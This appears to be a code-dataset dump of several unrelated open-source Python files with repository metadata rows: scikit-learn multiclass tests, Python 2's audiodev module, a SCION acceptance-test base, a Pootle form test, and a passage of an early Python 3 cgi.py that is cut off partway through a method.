X, y = iris.data, iris.target
X_sp = sp.csc_matrix(X)
# create an estimator that does not support sparse input
base_estimator = CheckingClassifier(
check_X=check_array,
check_X_params={"ensure_2d": True, "accept_sparse": False},
)
ecoc = OutputCodeClassifier(base_estimator, random_state=0)
with pytest.raises(TypeError, match="A sparse matrix was passed"):
ecoc.fit(X_sp, y)
ecoc.fit(X, y)
with pytest.raises(TypeError, match="A sparse matrix was passed"):
ecoc.predict(X_sp)
# smoke test to check when sparse input should be supported
ecoc = OutputCodeClassifier(LinearSVC(random_state=0))
ecoc.fit(X_sp, y).predict(X_sp)
assert len(ecoc.estimators_) == 4
def test_pairwise_indices():
clf_precomputed = svm.SVC(kernel='precomputed')
X, y = iris.data, iris.target
ovr_false = OneVsOneClassifier(clf_precomputed)
linear_kernel = np.dot(X, X.T)
ovr_false.fit(linear_kernel, y)
n_estimators = len(ovr_false.estimators_)
precomputed_indices = ovr_false.pairwise_indices_
for idx in precomputed_indices:
assert (idx.shape[0] * n_estimators / (n_estimators - 1) ==
linear_kernel.shape[0])
@ignore_warnings(category=FutureWarning)
def test_pairwise_attribute():
clf_precomputed = svm.SVC(kernel='precomputed')
clf_notprecomputed = svm.SVC()
for MultiClassClassifier in [OneVsRestClassifier, OneVsOneClassifier]:
ovr_false = MultiClassClassifier(clf_notprecomputed)
assert not ovr_false._pairwise
ovr_true = MultiClassClassifier(clf_precomputed)
assert ovr_true._pairwise
@pytest.mark.parametrize("MultiClassClassifier", [OneVsRestClassifier,
OneVsOneClassifier])
def test_pairwise_tag(MultiClassClassifier):
clf_precomputed = svm.SVC(kernel='precomputed')
clf_notprecomputed = svm.SVC()
ovr_false = MultiClassClassifier(clf_notprecomputed)
assert not ovr_false._get_tags()["pairwise"]
ovr_true = MultiClassClassifier(clf_precomputed)
assert ovr_true._get_tags()["pairwise"]
# TODO: Remove in 1.1
@pytest.mark.parametrize("MultiClassClassifier", [OneVsRestClassifier,
OneVsOneClassifier])
def test_pairwise_deprecated(MultiClassClassifier):
clf_precomputed = svm.SVC(kernel='precomputed')
ov_clf = MultiClassClassifier(clf_precomputed)
msg = r"Attribute _pairwise was deprecated in version 0\.24"
with pytest.warns(FutureWarning, match=msg):
ov_clf._pairwise
def test_pairwise_cross_val_score():
clf_precomputed = svm.SVC(kernel='precomputed')
clf_notprecomputed = svm.SVC(kernel='linear')
X, y = iris.data, iris.target
for MultiClassClassifier in [OneVsRestClassifier, OneVsOneClassifier]:
ovr_false = MultiClassClassifier(clf_notprecomputed)
ovr_true = MultiClassClassifier(clf_precomputed)
linear_kernel = np.dot(X, X.T)
score_precomputed = cross_val_score(ovr_true, linear_kernel, y)
score_linear = cross_val_score(ovr_false, X, y)
assert_array_equal(score_precomputed, score_linear)
@pytest.mark.parametrize("MultiClassClassifier",
[OneVsRestClassifier, OneVsOneClassifier])
# FIXME: we should move this test in `estimator_checks` once we are able
# to construct meta-estimator instances
def test_support_missing_values(MultiClassClassifier):
# smoke test to check that pipeline OvR and OvO classifiers are letting
# the validation of missing values to
# the underlying pipeline or classifiers
rng = np.random.RandomState(42)
X, y = iris.data, iris.target
X = np.copy(X) # Copy to avoid that the original data is modified
mask = rng.choice([1, 0], X.shape, p=[.1, .9]).astype(bool)
X[mask] = np.nan
lr = make_pipeline(SimpleImputer(),
LogisticRegression(random_state=rng))
MultiClassClassifier(lr).fit(X, y).score(X, y)
| bsd-3-clause | 7,494,563,634,628,996,000 | 36.599311 | 78 | 0.605759 | false |
mchristopher/PokemonGo-DesktopMap | app/pywin/Lib/audiodev.py | 286 | 7597 | """Classes for manipulating audio devices (currently only for Sun and SGI)"""
from warnings import warnpy3k
warnpy3k("the audiodev module has been removed in Python 3.0", stacklevel=2)
del warnpy3k
__all__ = ["error","AudioDev"]
class error(Exception):
pass
class Play_Audio_sgi:
# Private instance variables
## if 0: access frameratelist, nchannelslist, sampwidthlist, oldparams, \
## params, config, inited_outrate, inited_width, \
## inited_nchannels, port, converter, classinited: private
classinited = 0
frameratelist = nchannelslist = sampwidthlist = None
def initclass(self):
import AL
self.frameratelist = [
(48000, AL.RATE_48000),
(44100, AL.RATE_44100),
(32000, AL.RATE_32000),
(22050, AL.RATE_22050),
(16000, AL.RATE_16000),
(11025, AL.RATE_11025),
( 8000, AL.RATE_8000),
]
self.nchannelslist = [
(1, AL.MONO),
(2, AL.STEREO),
(4, AL.QUADRO),
]
self.sampwidthlist = [
(1, AL.SAMPLE_8),
(2, AL.SAMPLE_16),
(3, AL.SAMPLE_24),
]
self.classinited = 1
def __init__(self):
import al, AL
if not self.classinited:
self.initclass()
self.oldparams = []
self.params = [AL.OUTPUT_RATE, 0]
self.config = al.newconfig()
self.inited_outrate = 0
self.inited_width = 0
self.inited_nchannels = 0
self.converter = None
self.port = None
return
def __del__(self):
if self.port:
self.stop()
if self.oldparams:
import al, AL
al.setparams(AL.DEFAULT_DEVICE, self.oldparams)
self.oldparams = []
def wait(self):
if not self.port:
return
import time
while self.port.getfilled() > 0:
time.sleep(0.1)
self.stop()
def stop(self):
if self.port:
self.port.closeport()
self.port = None
if self.oldparams:
import al, AL
al.setparams(AL.DEFAULT_DEVICE, self.oldparams)
self.oldparams = []
def setoutrate(self, rate):
for (raw, cooked) in self.frameratelist:
if rate == raw:
self.params[1] = cooked
self.inited_outrate = 1
break
else:
raise error, 'bad output rate'
def setsampwidth(self, width):
for (raw, cooked) in self.sampwidthlist:
if width == raw:
self.config.setwidth(cooked)
self.inited_width = 1
break
else:
if width == 0:
import AL
self.inited_width = 0
self.config.setwidth(AL.SAMPLE_16)
self.converter = self.ulaw2lin
else:
raise error, 'bad sample width'
def setnchannels(self, nchannels):
for (raw, cooked) in self.nchannelslist:
if nchannels == raw:
self.config.setchannels(cooked)
self.inited_nchannels = 1
break
else:
raise error, 'bad # of channels'
def writeframes(self, data):
if not (self.inited_outrate and self.inited_nchannels):
raise error, 'params not specified'
if not self.port:
import al, AL
self.port = al.openport('Python', 'w', self.config)
self.oldparams = self.params[:]
al.getparams(AL.DEFAULT_DEVICE, self.oldparams)
al.setparams(AL.DEFAULT_DEVICE, self.params)
if self.converter:
data = self.converter(data)
self.port.writesamps(data)
def getfilled(self):
if self.port:
return self.port.getfilled()
else:
return 0
def getfillable(self):
if self.port:
return self.port.getfillable()
else:
return self.config.getqueuesize()
# private methods
## if 0: access *: private
def ulaw2lin(self, data):
import audioop
return audioop.ulaw2lin(data, 2)
class Play_Audio_sun:
## if 0: access outrate, sampwidth, nchannels, inited_outrate, inited_width, \
## inited_nchannels, converter: private
def __init__(self):
self.outrate = 0
self.sampwidth = 0
self.nchannels = 0
self.inited_outrate = 0
self.inited_width = 0
self.inited_nchannels = 0
self.converter = None
self.port = None
return
def __del__(self):
self.stop()
def setoutrate(self, rate):
self.outrate = rate
self.inited_outrate = 1
def setsampwidth(self, width):
self.sampwidth = width
self.inited_width = 1
def setnchannels(self, nchannels):
self.nchannels = nchannels
self.inited_nchannels = 1
def writeframes(self, data):
if not (self.inited_outrate and self.inited_width and self.inited_nchannels):
raise error, 'params not specified'
if not self.port:
import sunaudiodev, SUNAUDIODEV
self.port = sunaudiodev.open('w')
info = self.port.getinfo()
info.o_sample_rate = self.outrate
info.o_channels = self.nchannels
if self.sampwidth == 0:
info.o_precision = 8
self.o_encoding = SUNAUDIODEV.ENCODING_ULAW
# XXX Hack, hack -- leave defaults
else:
info.o_precision = 8 * self.sampwidth
info.o_encoding = SUNAUDIODEV.ENCODING_LINEAR
self.port.setinfo(info)
if self.converter:
data = self.converter(data)
self.port.write(data)
def wait(self):
if not self.port:
return
self.port.drain()
self.stop()
def stop(self):
if self.port:
self.port.flush()
self.port.close()
self.port = None
def getfilled(self):
if self.port:
return self.port.obufcount()
else:
return 0
## # Nobody remembers what this method does, and it's broken. :-(
## def getfillable(self):
## return BUFFERSIZE - self.getfilled()
def AudioDev():
# Dynamically try to import and use a platform specific module.
try:
import al
except ImportError:
try:
import sunaudiodev
return Play_Audio_sun()
except ImportError:
try:
import Audio_mac
except ImportError:
raise error, 'no audio device'
else:
return Audio_mac.Play_Audio_mac()
else:
return Play_Audio_sgi()
def test(fn = None):
import sys
if sys.argv[1:]:
fn = sys.argv[1]
else:
fn = 'f:just samples:just.aif'
import aifc
af = aifc.open(fn, 'r')
print fn, af.getparams()
p = AudioDev()
p.setoutrate(af.getframerate())
p.setsampwidth(af.getsampwidth())
p.setnchannels(af.getnchannels())
BUFSIZ = af.getframerate()/af.getsampwidth()/af.getnchannels()
while 1:
data = af.readframes(BUFSIZ)
if not data: break
print len(data)
p.writeframes(data)
p.wait()
if __name__ == '__main__':
test()
| mit | 8,759,556,957,160,831,000 | 28.219231 | 85 | 0.529946 | false |
Oncilla/scion | acceptance/common/base.py | 1 | 7373 | # Copyright 2019 Anapaya Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import re
import typing
from plumbum import cli
from plumbum import local
from plumbum import cmd
from plumbum import path
from acceptance.common.docker import Compose
from acceptance.common.log import LogExec
from acceptance.common.scion import SCION, SCIONSupervisor
NAME = 'NOT_SET' # must be set by users of the Base class.
DIR = 'NOT_SET'
logger = logging.getLogger(__name__)
def set_name(file: str):
global NAME
global DIR
DIR = local.path(file).dirname.name
NAME = DIR[:-len('_acceptance')]
class TestState:
"""
TestState is used to share state between the command
and the sub-command.
"""
artifacts = None
def __init__(self, scion: SCION, dc: Compose):
"""
Create new environment state for an execution of the acceptance
testing framework. Plumbum subcommands can access this state
via the parent to retrieve information about the test environment.
"""
self.scion = scion
self.dc = dc
self.topology_tar = ""
self.containers_tar = ""
if 'TEST_UNDECLARED_OUTPUTS_DIR' in os.environ:
self.artifacts = local.path(os.environ['TEST_UNDECLARED_OUTPUTS_DIR'])
else:
self.artifacts = local.path("/tmp/artifacts-scion")
self.dc.compose_file = self.artifacts / 'gen/scion-dc.yml'
self.no_docker = False
self.tools_dc = local['./tools/dc']
class TestBase(cli.Application):
"""
TestBase is used to implement the test entry point. Tests should
sub-class it and only define the doc string.
"""
test_state = None # type: TestState
@cli.switch('disable-docker', envname='DISABLE_DOCKER',
help='Run in supervisor environment.')
def disable_docker(self):
self.test_state.no_docker = True
self.test_state.scion = SCIONSupervisor()
@cli.switch('artifacts', str, envname='ACCEPTANCE_ARTIFACTS',
help='Artifacts directory (for legacy tests)')
def artifacts_dir(self, a_dir: str):
self.test_state.artifacts = local.path('%s/%s/' % (a_dir, NAME))
@cli.switch('artifacts_dir', str, help='Artifacts directory (for bazel tests)')
def artifacts_dir_new(self, a_dir: str):
self.test_state.artifacts = local.path(a_dir)
self.test_state.dc.compose_file = self.test_state.artifacts / 'gen/scion-dc.yml'
@cli.switch('topology_tar', str, help="The tarball with the topology files")
def topology_tar(self, tar: str):
self.test_state.topology_tar = tar
@cli.switch('containers_tar', str, help="The tarball with the containers")
def containers_tar(self, tar: str):
self.test_state.containers_tar = tar
@cli.switch('bazel_rule', str, help="The bazel rule that triggered the test")
def test_type(self, rule: str):
self.test_state.bazel_rule = rule
def _unpack_topo(self):
cmd.tar('-xf', self.test_state.topology_tar, '-C', self.test_state.artifacts)
cmd.sed('-i', 's#$SCIONROOT#%s#g' % self.test_state.artifacts,
self.test_state.artifacts / 'gen/scion-dc.yml')
self.test_state.dc.compose_file = self.test_state.artifacts / 'gen/scion-dc.yml'
def setup_prepare(self):
"""Unpacks the topology and loads local docker images.
"""
# Delete old artifacts, if any.
cmd.rm("-rf", self.test_state.artifacts)
cmd.mkdir(self.test_state.artifacts)
print('artifacts dir: %s' % self.test_state.artifacts)
self._unpack_topo()
print(cmd.docker('image', 'load', '-i', self.test_state.containers_tar))
def setup(self):
self.setup_prepare()
self.setup_start()
def setup_start(self):
"""Starts the docker containers in the topology.
"""
print(self.test_state.dc('up', '-d'))
print(self.test_state.dc('ps'))
def teardown(self):
out_dir = self.test_state.artifacts / 'logs'
self.test_state.dc.collect_logs(out_dir=out_dir)
ps = self.test_state.dc('ps')
print(self.test_state.dc('down', '-v'))
if re.search(r"Exit\s+[1-9]\d*", ps):
raise Exception("Failed services.\n" + ps)
def send_signal(self, container, signal):
"""Sends signal to a container.
Args:
container: the name of the container.
signal: the signal to send
"""
print(self.test_state.dc("kill", "-s", signal, container))
class CmdBase(cli.Application):
""" CmdBase is used to implement the test sub-commands. """
tools_dc = local['./tools/dc']
def cmd_dc(self, *args):
for line in self.dc(*args).splitlines():
print(line)
def cmd_setup(self):
cmd.mkdir('-p', self.artifacts)
def cmd_teardown(self):
if not self.no_docker:
self.dc.collect_logs(self.artifacts / 'logs' / 'docker')
self.tools_dc('down')
self.scion.stop()
def _collect_logs(self, name: str):
if path.local.LocalPath('gen/%s-dc.yml' % name).exists():
self.tools_dc('collect_logs', name, self.artifacts / 'logs' / 'docker')
def _teardown(self, name: str):
if path.local.LocalPath('gen/%s-dc.yml' % name).exists():
self.tools_dc(name, 'down')
@staticmethod
def test_dir(prefix: str = '', directory: str = 'acceptance') -> path.local.LocalPath:
return local.path(prefix, directory) / DIR
@staticmethod
def docker_status():
logger.info('Docker containers')
print(cmd.docker('ps', '-a', '-s'))
@property
def dc(self):
return self.parent.test_state.dc
@property
def artifacts(self):
return self.parent.test_state.artifacts
@property
def scion(self):
return self.parent.test_state.scion
@property
def no_docker(self):
return self.parent.test_state.no_docker
@TestBase.subcommand('name')
class TestName(CmdBase):
def main(self):
print(NAME)
@TestBase.subcommand('teardown')
class TestTeardown(CmdBase):
"""
Teardown topology by stopping all running services..
In a dockerized topology, the logs are collected.
"""
@LogExec(logger, 'teardown')
def main(self):
self.cmd_teardown()
def register_commands(c: typing.Type[TestBase]):
"""
Registers the default subcommands to the test class c.
"""
class TestSetup(c):
def main(self):
self.setup()
class TestRun(c):
def main(self):
self._run()
class TestTeardown(c):
def main(self):
self.teardown()
c.subcommand("setup", TestSetup)
c.subcommand("run", TestRun)
c.subcommand("teardown", TestTeardown)
| apache-2.0 | 7,475,001,507,042,508,000 | 30.241525 | 90 | 0.630408 | false |
unho/pootle | tests/pootle_app/forms.py | 5 | 1571 | # -*- coding: utf-8 -*-
#
# Copyright (C) Pootle contributors.
#
# This file is a part of the Pootle project. It is distributed under the GPL3
# or later license. See the LICENSE file for a copy of the license and the
# AUTHORS file for copyright and authorship information.
import pytest
from pootle_app.forms import PermissionsUsersSearchForm
from pootle_app.models.permissions import PermissionSet, get_pootle_permission
@pytest.mark.django_db
def test_form_permissions_users(project0, member, member2):
# must supply a directory
with pytest.raises(KeyError):
PermissionsUsersSearchForm()
form = PermissionsUsersSearchForm(
directory=project0.directory, data={})
assert not form.is_valid()
assert "q" in form.errors
form = PermissionsUsersSearchForm(
directory=project0.directory,
data=dict(q="mem"))
assert form.is_valid()
assert form.cleaned_data == dict(q="mem")
results = form.search()["results"]
assert results[0]['text'] == member.username
assert results[0]['id'] == member.pk
assert results[1]['text'] == member2.username
assert results[1]['id'] == member2.pk
# providing a user with permissions in this directory
# means they are excluded from search results
view = get_pootle_permission('view')
perm_set = PermissionSet.objects.create(
user=member,
directory=project0.directory)
perm_set.positive_permissions.add(view)
assert form.search() == {
'results': [
{'text': member2.username, 'id': member2.pk}]}
| gpl-3.0 | -6,699,444,047,953,784,000 | 31.061224 | 78 | 0.688733 | false |
glwu/python-for-android | python3-alpha/python3-src/Lib/cgi.py | 46 | 34484 | #! /usr/local/bin/python
# NOTE: the above "/usr/local/bin/python" is NOT a mistake. It is
# intentionally NOT "/usr/bin/env python". On many systems
# (e.g. Solaris), /usr/local/bin is not in $PATH as passed to CGI
# scripts, and /usr/local/bin is the default directory where Python is
# installed, so /usr/bin/env would be unable to find python. Granted,
# binary installations by Linux vendors often install Python in
# /usr/bin. So let those vendors patch cgi.py to match their choice
# of installation.
"""Support module for CGI (Common Gateway Interface) scripts.
This module defines a number of utilities for use by CGI scripts
written in Python.
"""
# History
# -------
#
# Michael McLay started this module. Steve Majewski changed the
# interface to SvFormContentDict and FormContentDict. The multipart
# parsing was inspired by code submitted by Andreas Paepcke. Guido van
# Rossum rewrote, reformatted and documented the module and is currently
# responsible for its maintenance.
#
__version__ = "2.6"
# Imports
# =======
from io import StringIO, BytesIO, TextIOWrapper
import sys
import os
import urllib.parse
from email.parser import FeedParser
from warnings import warn
import html
import locale
import tempfile
__all__ = ["MiniFieldStorage", "FieldStorage",
"parse", "parse_qs", "parse_qsl", "parse_multipart",
"parse_header", "print_exception", "print_environ",
"print_form", "print_directory", "print_arguments",
"print_environ_usage", "escape"]
# Logging support
# ===============
logfile = "" # Filename to log to, if not empty
logfp = None # File object to log to, if not None
def initlog(*allargs):
"""Write a log message, if there is a log file.
Even though this function is called initlog(), you should always
use log(); log is a variable that is set either to initlog
(initially), to dolog (once the log file has been opened), or to
nolog (when logging is disabled).
The first argument is a format string; the remaining arguments (if
any) are arguments to the % operator, so e.g.
log("%s: %s", "a", "b")
will write "a: b" to the log file, followed by a newline.
If the global logfp is not None, it should be a file object to
which log data is written.
If the global logfp is None, the global logfile may be a string
giving a filename to open, in append mode. This file should be
world writable!!! If the file can't be opened, logging is
silently disabled (since there is no safe place where we could
send an error message).
"""
global logfp, log
if logfile and not logfp:
try:
logfp = open(logfile, "a")
except IOError:
pass
if not logfp:
log = nolog
else:
log = dolog
log(*allargs)
def dolog(fmt, *args):
"""Write a log message to the log file. See initlog() for docs."""
logfp.write(fmt%args + "\n")
def nolog(*allargs):
"""Dummy function, assigned to log when logging is disabled."""
pass
log = initlog # The current logging function
# Parsing functions
# =================
# Maximum input we will accept when REQUEST_METHOD is POST
# 0 ==> unlimited input
maxlen = 0
def parse(fp=None, environ=os.environ, keep_blank_values=0, strict_parsing=0):
"""Parse a query in the environment or from a file (default stdin)
Arguments, all optional:
fp : file pointer; default: sys.stdin.buffer
environ : environment dictionary; default: os.environ
keep_blank_values: flag indicating whether blank values in
percent-encoded forms should be treated as blank strings.
A true value indicates that blanks should be retained as
blank strings. The default false value indicates that
blank values are to be ignored and treated as if they were
not included.
strict_parsing: flag indicating what to do with parsing errors.
If false (the default), errors are silently ignored.
If true, errors raise a ValueError exception.
"""
if fp is None:
fp = sys.stdin
# field keys and values (except for files) are returned as strings
# an encoding is required to decode the bytes read from self.fp
if hasattr(fp,'encoding'):
encoding = fp.encoding
else:
encoding = 'latin-1'
# fp.read() must return bytes
if isinstance(fp, TextIOWrapper):
fp = fp.buffer
if not 'REQUEST_METHOD' in environ:
environ['REQUEST_METHOD'] = 'GET' # For testing stand-alone
if environ['REQUEST_METHOD'] == 'POST':
ctype, pdict = parse_header(environ['CONTENT_TYPE'])
if ctype == 'multipart/form-data':
return parse_multipart(fp, pdict)
elif ctype == 'application/x-www-form-urlencoded':
clength = int(environ['CONTENT_LENGTH'])
if maxlen and clength > maxlen:
raise ValueError('Maximum content length exceeded')
qs = fp.read(clength).decode(encoding)
else:
qs = '' # Unknown content-type
if 'QUERY_STRING' in environ:
if qs: qs = qs + '&'
qs = qs + environ['QUERY_STRING']
elif sys.argv[1:]:
if qs: qs = qs + '&'
qs = qs + sys.argv[1]
environ['QUERY_STRING'] = qs # XXX Shouldn't, really
elif 'QUERY_STRING' in environ:
qs = environ['QUERY_STRING']
else:
if sys.argv[1:]:
qs = sys.argv[1]
else:
qs = ""
environ['QUERY_STRING'] = qs # XXX Shouldn't, really
return urllib.parse.parse_qs(qs, keep_blank_values, strict_parsing,
encoding=encoding)
# parse query string function called from urlparse,
# this is done in order to maintain backward compatiblity.
def parse_qs(qs, keep_blank_values=0, strict_parsing=0):
"""Parse a query given as a string argument."""
warn("cgi.parse_qs is deprecated, use urllib.parse.parse_qs instead",
DeprecationWarning, 2)
return urllib.parse.parse_qs(qs, keep_blank_values, strict_parsing)
def parse_qsl(qs, keep_blank_values=0, strict_parsing=0):
"""Parse a query given as a string argument."""
warn("cgi.parse_qsl is deprecated, use urllib.parse.parse_qsl instead",
DeprecationWarning, 2)
return urllib.parse.parse_qsl(qs, keep_blank_values, strict_parsing)
def parse_multipart(fp, pdict):
"""Parse multipart input.
Arguments:
fp : input file
pdict: dictionary containing other parameters of content-type header
Returns a dictionary just like parse_qs(): keys are the field names, each
value is a list of values for that field. This is easy to use but not
much good if you are expecting megabytes to be uploaded -- in that case,
use the FieldStorage class instead which is much more flexible. Note
that content-type is the raw, unparsed contents of the content-type
header.
XXX This does not parse nested multipart parts -- use FieldStorage for
that.
XXX This should really be subsumed by FieldStorage altogether -- no
point in having two implementations of the same parsing algorithm.
Also, FieldStorage protects itself better against certain DoS attacks
by limiting the size of the data read in one chunk. The API here
does not support that kind of protection. This also affects parse()
since it can call parse_multipart().
"""
import http.client
boundary = ""
if 'boundary' in pdict:
boundary = pdict['boundary']
if not valid_boundary(boundary):
raise ValueError('Invalid boundary in multipart form: %r'
% (boundary,))
nextpart = "--" + boundary
lastpart = "--" + boundary + "--"
partdict = {}
terminator = ""
while terminator != lastpart:
bytes = -1
data = None
if terminator:
# At start of next part. Read headers first.
headers = http.client.parse_headers(fp)
clength = headers.get('content-length')
if clength:
try:
bytes = int(clength)
except ValueError:
pass
if bytes > 0:
if maxlen and bytes > maxlen:
raise ValueError('Maximum content length exceeded')
data = fp.read(bytes)
else:
data = ""
# Read lines until end of part.
lines = []
while 1:
line = fp.readline()
if not line:
terminator = lastpart # End outer loop
break
if line.startswith("--"):
terminator = line.rstrip()
if terminator in (nextpart, lastpart):
break
lines.append(line)
# Done with part.
if data is None:
continue
if bytes < 0:
if lines:
# Strip final line terminator
line = lines[-1]
if line[-2:] == "\r\n":
line = line[:-2]
elif line[-1:] == "\n":
line = line[:-1]
lines[-1] = line
data = "".join(lines)
line = headers['content-disposition']
if not line:
continue
key, params = parse_header(line)
if key != 'form-data':
continue
if 'name' in params:
name = params['name']
else:
continue
if name in partdict:
partdict[name].append(data)
else:
partdict[name] = [data]
return partdict
def _parseparam(s):
while s[:1] == ';':
s = s[1:]
end = s.find(';')
while end > 0 and s.count('"', 0, end) % 2:
end = s.find(';', end + 1)
if end < 0:
end = len(s)
f = s[:end]
yield f.strip()
s = s[end:]
def parse_header(line):
"""Parse a Content-type like header.
Return the main content-type and a dictionary of options.
"""
parts = _parseparam(';' + line)
key = parts.__next__()
pdict = {}
for p in parts:
i = p.find('=')
if i >= 0:
name = p[:i].strip().lower()
value = p[i+1:].strip()
if len(value) >= 2 and value[0] == value[-1] == '"':
value = value[1:-1]
value = value.replace('\\\\', '\\').replace('\\"', '"')
pdict[name] = value
return key, pdict
# Classes for field storage
# =========================
class MiniFieldStorage:
"""Like FieldStorage, for use when no file uploads are possible."""
# Dummy attributes
filename = None
list = None
type = None
file = None
type_options = {}
disposition = None
disposition_options = {}
headers = {}
def __init__(self, name, value):
"""Constructor from field name and value."""
self.name = name
self.value = value
# self.file = StringIO(value)
def __repr__(self):
"""Return printable representation."""
return "MiniFieldStorage(%r, %r)" % (self.name, self.value)
class FieldStorage:
"""Store a sequence of fields, reading multipart/form-data.
This class provides naming, typing, files stored on disk, and
more. At the top level, it is accessible like a dictionary, whose
keys are the field names. (Note: None can occur as a field name.)
The items are either a Python list (if there's multiple values) or
another FieldStorage or MiniFieldStorage object. If it's a single
object, it has the following attributes:
name: the field name, if specified; otherwise None
filename: the filename, if specified; otherwise None; this is the
client side filename, *not* the file name on which it is
stored (that's a temporary file you don't deal with)
value: the value as a *string*; for file uploads, this
transparently reads the file every time you request the value
and returns *bytes*
file: the file(-like) object from which you can read the data *as
bytes* ; None if the data is stored a simple string
type: the content-type, or None if not specified
type_options: dictionary of options specified on the content-type
line
disposition: content-disposition, or None if not specified
disposition_options: dictionary of corresponding options
headers: a dictionary(-like) object (sometimes email.message.Message or a
subclass thereof) containing *all* headers
The class is subclassable, mostly for the purpose of overriding
the make_file() method, which is called internally to come up with
a file open for reading and writing. This makes it possible to
override the default choice of storing all files in a temporary
directory and unlinking them as soon as they have been opened.
"""
def __init__(self, fp=None, headers=None, outerboundary=b'',
environ=os.environ, keep_blank_values=0, strict_parsing=0,
limit=None, encoding='utf-8', errors='replace'):
"""Constructor. Read multipart/* until last part.
Arguments, all optional:
fp : file pointer; default: sys.stdin.buffer
(not used when the request method is GET)
Can be :
1. a TextIOWrapper object
2. an object whose read() and readline() methods return bytes
headers : header dictionary-like object; default:
taken from environ as per CGI spec
outerboundary : terminating multipart boundary
(for internal use only)
environ : environment dictionary; default: os.environ
keep_blank_values: flag indicating whether blank values in
percent-encoded forms should be treated as blank strings.
A true value indicates that blanks should be retained as
blank strings. The default false value indicates that
blank values are to be ignored and treated as if they were
not included.
strict_parsing: flag indicating what to do with parsing errors.
If false (the default), errors are silently ignored.
If true, errors raise a ValueError exception.
limit : used internally to read parts of multipart/form-data forms,
to exit from the reading loop when reached. It is the difference
between the form content-length and the number of bytes already
read
encoding, errors : the encoding and error handler used to decode the
binary stream to strings. Must be the same as the charset defined
for the page sending the form (content-type : meta http-equiv or
header)
"""
method = 'GET'
self.keep_blank_values = keep_blank_values
self.strict_parsing = strict_parsing
if 'REQUEST_METHOD' in environ:
method = environ['REQUEST_METHOD'].upper()
self.qs_on_post = None
if method == 'GET' or method == 'HEAD':
if 'QUERY_STRING' in environ:
qs = environ['QUERY_STRING']
elif sys.argv[1:]:
qs = sys.argv[1]
else:
qs = ""
qs = qs.encode(locale.getpreferredencoding(), 'surrogateescape')
fp = BytesIO(qs)
if headers is None:
headers = {'content-type':
"application/x-www-form-urlencoded"}
if headers is None:
headers = {}
if method == 'POST':
# Set default content-type for POST to what's traditional
headers['content-type'] = "application/x-www-form-urlencoded"
if 'CONTENT_TYPE' in environ:
headers['content-type'] = environ['CONTENT_TYPE']
if 'QUERY_STRING' in environ:
self.qs_on_post = environ['QUERY_STRING']
if 'CONTENT_LENGTH' in environ:
headers['content-length'] = environ['CONTENT_LENGTH']
if fp is None:
self.fp = sys.stdin.buffer
# self.fp.read() must return bytes
elif isinstance(fp, TextIOWrapper):
self.fp = fp.buffer
else:
self.fp = fp
self.encoding = encoding
self.errors = errors
self.headers = headers
if not isinstance(outerboundary, bytes):
raise TypeError('outerboundary must be bytes, not %s'
% type(outerboundary).__name__)
self.outerboundary = outerboundary
self.bytes_read = 0
self.limit = limit
# Process content-disposition header
cdisp, pdict = "", {}
if 'content-disposition' in self.headers:
cdisp, pdict = parse_header(self.headers['content-disposition'])
self.disposition = cdisp
self.disposition_options = pdict
self.name = None
if 'name' in pdict:
self.name = pdict['name']
self.filename = None
if 'filename' in pdict:
self.filename = pdict['filename']
self._binary_file = self.filename is not None
# Process content-type header
#
# Honor any existing content-type header. But if there is no
# content-type header, use some sensible defaults. Assume
# outerboundary is "" at the outer level, but something non-false
# inside a multi-part. The default for an inner part is text/plain,
# but for an outer part it should be urlencoded. This should catch
# bogus clients which erroneously forget to include a content-type
# header.
#
# See below for what we do if there does exist a content-type header,
# but it happens to be something we don't understand.
if 'content-type' in self.headers:
ctype, pdict = parse_header(self.headers['content-type'])
elif self.outerboundary or method != 'POST':
ctype, pdict = "text/plain", {}
else:
ctype, pdict = 'application/x-www-form-urlencoded', {}
self.type = ctype
self.type_options = pdict
if 'boundary' in pdict:
self.innerboundary = pdict['boundary'].encode(self.encoding)
else:
self.innerboundary = b""
clen = -1
if 'content-length' in self.headers:
try:
clen = int(self.headers['content-length'])
except ValueError:
pass
if maxlen and clen > maxlen:
raise ValueError('Maximum content length exceeded')
self.length = clen
if self.limit is None and clen:
self.limit = clen
self.list = self.file = None
self.done = 0
if ctype == 'application/x-www-form-urlencoded':
self.read_urlencoded()
elif ctype[:10] == 'multipart/':
self.read_multi(environ, keep_blank_values, strict_parsing)
else:
self.read_single()
def __repr__(self):
"""Return a printable representation."""
return "FieldStorage(%r, %r, %r)" % (
self.name, self.filename, self.value)
def __iter__(self):
return iter(self.keys())
def __getattr__(self, name):
if name != 'value':
raise AttributeError(name)
if self.file:
self.file.seek(0)
value = self.file.read()
self.file.seek(0)
elif self.list is not None:
value = self.list
else:
value = None
return value
def __getitem__(self, key):
"""Dictionary style indexing."""
if self.list is None:
raise TypeError("not indexable")
found = []
for item in self.list:
if item.name == key: found.append(item)
if not found:
raise KeyError(key)
if len(found) == 1:
return found[0]
else:
return found
def getvalue(self, key, default=None):
"""Dictionary style get() method, including 'value' lookup."""
if key in self:
value = self[key]
if isinstance(value, list):
return [x.value for x in value]
else:
return value.value
else:
return default
def getfirst(self, key, default=None):
""" Return the first value received."""
if key in self:
value = self[key]
if isinstance(value, list):
return value[0].value
else:
return value.value
else:
return default
def getlist(self, key):
""" Return list of received values."""
if key in self:
value = self[key]
if isinstance(value, list):
return [x.value for x in value]
else:
return [value.value]
else:
return []
def keys(self):
"""Dictionary style keys() method."""
if self.list is None:
raise TypeError("not indexable")
return list(set(item.name for item in self.list))
def __contains__(self, key):
"""Dictionary style __contains__ method."""
if self.list is None:
raise TypeError("not indexable")
return any(item.name == key for item in self.list)
def __len__(self):
"""Dictionary style len(x) support."""
return len(self.keys())
def __nonzero__(self):
return bool(self.list)
def read_urlencoded(self):
"""Internal: read data in query string format."""
qs = self.fp.read(self.length)
if not isinstance(qs, bytes):
raise ValueError("%s should return bytes, got %s" \
% (self.fp, type(qs).__name__))
qs = qs.decode(self.encoding, self.errors)
if self.qs_on_post:
qs += '&' + self.qs_on_post
self.list = []
query = urllib.parse.parse_qsl(
qs, self.keep_blank_values, self.strict_parsing,
encoding=self.encoding, errors=self.errors)
for key, value in query:
